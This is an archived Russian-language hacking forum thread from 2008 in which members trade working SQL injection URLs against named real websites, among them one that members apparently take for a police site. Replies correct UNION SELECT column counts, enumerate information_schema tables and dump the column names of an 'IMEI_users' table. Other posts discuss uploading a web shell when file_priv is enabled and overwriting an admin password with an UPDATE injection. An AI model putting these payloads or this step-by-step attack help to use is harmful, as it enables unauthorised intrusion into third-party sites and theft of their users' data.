ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4421  
Старый 30.12.2008, 22:19
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Thrasher88
фильтрирует...

F4R
заабей... )

юниона нема? (
Цитата:
http://www.hawkingtech.com/downloads.php?file_id=2340+union+select+1/*
иьект у мусаров?
Цитата:
http://rpolice.ru/download.php?file_id=-176+or+1=1

Последний раз редактировалось sabe; 30.12.2008 в 22:33..
 
Ответить с цитированием

  #4422  
Старый 30.12.2008, 22:45
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

Цитата:
http://dixis.ru/actions.php?act_id=-347+union+select+1,version(),table_name,4,5,6,7,8, 9,10,11,12+from+information_schema.tables+limit+1, 1%20--
почему ошибка?
 
Ответить с цитированием

  #4423  
Старый 30.12.2008, 22:59
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Для начало - там 13 столбцов...

Код:
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(table_name,0x3a,table_rows),4,5,6,7,8,9,10,11,12,13+from+information_schema.tables--
To sabe:

Код:
http://www.hawkingtech.com/downloads.php?file_id=2340+and+substring(version(),1,1)=3
3-я ветка..

Последний раз редактировалось R1dex; 30.12.2008 в 23:04..
 
Ответить с цитированием

  #4424  
Старый 30.12.2008, 23:35
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

а как например вывести колонки из IMEI_users ???
Цитата:
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name,0x3a ),4,5,6,7,8,9,10,11,12,13+from+information_schema. columns--
 
Ответить с цитированием

  #4425  
Старый 30.12.2008, 23:48
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Вот так.

Код:
http://dixis.ru/actions.php?act_id=-347+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x494d45495f7573657273--
 
Ответить с цитированием

  #4426  
Старый 31.12.2008, 01:11
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!
 
Ответить с цитированием

  #4427  
Старый 31.12.2008, 01:18
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от Octave_Parango  
Всех приветствую.
Подскажите, обязательным ли условием является не экранирование кавычек при заливе шелла при том, что file_priv = Y.
Спасибо!
Да, но даже при меджик квотс = он можно выкрутиться, вот смотри: https://forum.antichat.ru/showpost.p...5&postcount=39

Меня это спасало не один раз, да и имея возможность читать сорцы сайта, можно найти ещё какую-нидь уязвимость или туже "двойную скулю", но в другом скрипте.
 
Ответить с цитированием

  #4428  
Старый 31.12.2008, 01:41
Thrasher88
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406

Репутация: 37
По умолчанию

По-идее при SQL-инъекции в MySQL можно использовать команду UPDATE, так? Подскажите, как тогда будет выглядеть запрос к БД? Примерно так?
Цитата:
http://localhost/index.php?id=-1+update+1,2,3,4,5,6+название_таблиц ы+set+password='admin'+where+id='1'--
 
Ответить с цитированием

  #4429  
Старый 31.12.2008, 01:46
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

sql надо изучать с бд, а не с sql-inj тогда не будет таких глупых вопросов
 
Ответить с цитированием

  #4430  
Старый 31.12.2008, 01:52
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Народ пытаюсь обновить колонку (инфу о юзере) и когда жму на EDIT
то выскакивает редактирование ПУСТЫХ полей! в чем дело??? Прова на запись есть! (раньше редактировал)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ